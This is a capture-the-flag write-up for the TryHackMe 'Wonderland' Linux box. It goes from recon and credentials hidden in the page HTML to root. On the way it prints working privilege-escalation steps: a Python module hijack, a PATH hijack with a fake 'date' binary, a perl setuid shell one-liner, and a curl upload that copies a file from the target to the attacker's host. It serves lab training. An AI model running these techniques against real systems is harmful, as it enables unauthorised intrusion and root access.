Wonderland
A medium Linux box from TryHackMe, get initial access by finding creds in site HTML, then escalate privilege through PATH vulnerabilities, and exploit an SUID binary for root
Recon
Running the standard nmap
sudo nmap -sC -sV -Pn -oA nmap/wonderland 10.10.224.95
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Navigating to the web page, just a static html page
Enumerating the directories with
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u 10.10.224.95
And find a directory “/r/”
Navigating to it, tells you to follow the rabbit, so just try it out, and spell rabbit using the url
“10.10.224.95/r/a/b/b/i/t/”
And get to a special page, where it tells you to open the door
Inspecting the page, find some hidden creds - alice:HowDothTheLittleCrocodileImproveHisShiningTail
<body>
<h1>Open the door and enter wonderland</h1>
<p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
<p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
</p>
<p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
<img src="[/img/alice_door.png](view-source:http://10.10.224.95/img/alice_door.png)" style="height: 50rem;">
</body>
SSH-ing into the box, get a shell as Alice
ssh alice@10.10.224.95
Exploitation
In the home directory
alice@wonderland:~$ ls -la
drwxr-xr-x 5 alice alice 4096 May 25 2020 .
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice 220 May 25 2020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25 2020 .bashrc
drwx------ 2 alice alice 4096 May 25 2020 .cache
drwx------ 3 alice alice 4096 May 25 2020 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25 2020 .local
-rw-r--r-- 1 alice alice 807 May 25 2020 .profile
-rw------- 1 root root 66 May 25 2020 root.txt
-rw-r--r-- 1 root root 3577 May 25 2020 walrus_and_the_carpenter.py
Of note is the walrus_and_the_carpenter.py, further enumeration with sudo reveals that alice can run this python file as the “rabbit” user
sudo -l
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
Looking at the python script, it imports the “random” library, and then prints random lines from a set of lines
Looking at the python library path list by running
alice@wonderland:~$ python3 -c "import sys;print(sys.path)"
['', '/usr/lib/python36.zip', '/usr/lib/python3.6', '/usr/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/dist-packages', '/usr/lib/python3/dist-packages']
The first item, ’ ‘, is the current directoy - so the file is susceptible to a path based vulnerability as a random.py file will first be looked for (and loaded from) the current directory, rather than the /usr/lib/python3.6/ directory where the actual file is
Creating a file to escalate to a “rabbit” user bash shell called random.py in the home directory
import os
os.system("/bin/bash")
Then run the script as the rabbit user with sudo
alice@wonderland:~$ sudo -u rabbit python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ whoami
rabbit
Now as rabbit, see a “teaParty” file with the SUID bit enabled in the rabbit home directory
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Sat, 10 Sep 2022 03:25:27 +0000
Ask very nicely, and I will give you some tea while you wait for him
rabbit@wonderland:/home/rabbit$ ls -la
-rw-r--r-- 1 rabbit rabbit 220 May 25 2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit 3771 May 25 2020 .bashrc
-rw-r--r-- 1 rabbit rabbit 807 May 25 2020 .profile
-rwsr-sr-x 1 root root 16816 May 25 2020 teaParty
Exfiltrate the file with curl PUT option
Start the PUT python server on the kali machine
python3 put-server.py --bind localhost 8000
Then exfiltrate from the victim
curl -T ./teaParty 10.6.107.137:8000
Can dis-assemble with ghidra but I didn’t wanna download the 1.2Gb, so I just ran strings on the file and hoped for the best
strings ./teaParty
...
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
...
Can see that to output the message, teaParty runs the command “date” without using the full path - maybe its susceptible to another path vulnerability?
Looking at the PATH variable, see that you can add /tmp to the beginning of it with
export PATH=/tmp:$PATH
Now we can add a custom “date” binary that just gives us a further privileged shell as it will be found first in the PATH search
Then on the kali box, create date.c that launches a bash shell
#include <stdlib.h>
int main(){
system("/bin/bash")
}
Then compile
gcc date.c -o date
And then transfer the file to the victim and into the /tmp folder
Then run the teaParty executable to get a shell as “hatter”
Inside hatter’s home directory find a password.txt file, only containing the password of the “hatter” user unfortunately
WhyIsARavenLikeAWritingDesk?
SSH in as the hatter with the password again
Enumerating again from the beginning, see that this user can run perl with the SUID capability set
hatter@wonderland:/home/hatter$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
Using GTFObins, see a copy+paste solution to exploit the SUID capability
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
And get root!